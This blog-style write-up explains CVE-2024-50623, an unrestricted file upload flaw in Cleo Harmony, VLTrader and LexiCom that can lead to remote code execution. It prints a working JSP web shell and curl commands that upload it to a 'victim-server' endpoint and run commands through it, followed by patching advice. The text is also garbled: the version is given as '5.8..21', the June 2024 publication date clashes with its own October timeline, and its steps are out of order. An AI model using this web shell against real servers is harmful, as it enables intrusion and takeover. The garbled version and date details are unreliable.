CVE-2024-50623 - How Unrestricted File Upload in Cleo Harmony, VLTrader, and LexiCom Can Lead to Remote Code Execution

In June 2024, a critical security vulnerability was published as CVE-2024-50623. This vulnerability affects multiple products from Cleo: Harmony, VLTrader, and LexiCom — all before version 5.8..21. What makes this flaw so dangerous is that it allows attackers to upload and download arbitrary files, which can ultimately lead to remote code execution (RCE). In this post, I’ll break down the issue in simple terms, walk you through a conceptual exploit, and link out to key resources.

Cleo LexiCom (before 5.8..21)

These are file transfer automation tools often used in enterprise environments to handle secure data exchanges.


## The Vulnerability: Unrestricted File Upload/Download

At its core, the issue relates to insufficient validation or control over file uploads and downloads. This means an attacker can upload any file of their choosing to the server, and potentially fetch or execute it — all without proper authorization or checks.

In web security, unrestricted file upload is particularly dangerous. If you can upload arbitrary code and then force the server to execute it, you have a direct path to remote code execution.

Reference Links

- CVE-2024-50623 on NVD/NIST
- Cleo Harmony Official Website
- Cleo Security Advisory Page (Check for latest patches and advisories)

The attacker authenticates (or maybe finds an exposed upload endpoint).

2. Using a tool like curl or via the web interface, the attacker uploads a file named cmd.jsp (for example, if the backend is Java). This is a web shell with the ability to run commands.

<%@ page import="java.io.*" %>
<%
if(request.getParameter("cmd") != null) {
  Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
  OutputStream os = p.getOutputStream();
  InputStream in = p.getInputStream();
  int a = -1;
  while((a=in.read())!=-1) out.print((char)a);
}
%>

Step 2: Access/Execute the Uploaded Script

1. Visit: http://server/CleoUploads/cmd.jsp?cmd=whoami

Step 3: Full Takeover

From here, the attacker can upload more advanced malware, escalate privileges, or pivot to other internal systems.

Assume the vulnerable Cleo application allows file uploads at the /file-upload endpoint

curl -X POST -F 'file=@cmd.jsp' http://victim-server:808/file-upload

Now, access the shell

curl 'http://victim-server:808/uploads/cmd.jsp?cmd=netstat';

Note: In real-world Cleo environments, upload and file access paths may differ depending on configuration. The principle remains: if arbitrary files are accepted and accessible, this is possible.

How to Fix

- Upgrade to 5.8..21 or later: Cleo has released fixes — check here.

Restrict file types and extensions: Accept only safe file types; block scripts and executables.

- Limit upload location and permissions: Uploaded files should not be executable or accessible from the web.

Final Thoughts

If you’re running Cleo Harmony, VLTrader, or LexiCom below version 5.8..21, you should patch ASAP. Unchecked file upload/download functionality can give an attacker everything they need to compromise your business.

For more, always check Cleo’s official advisories — and don’t delay in applying those security updates!

Timeline

Published on: 10/28/2024 00:15:03 UTC
Last modified on: 12/14/2024 02:00:02 UTC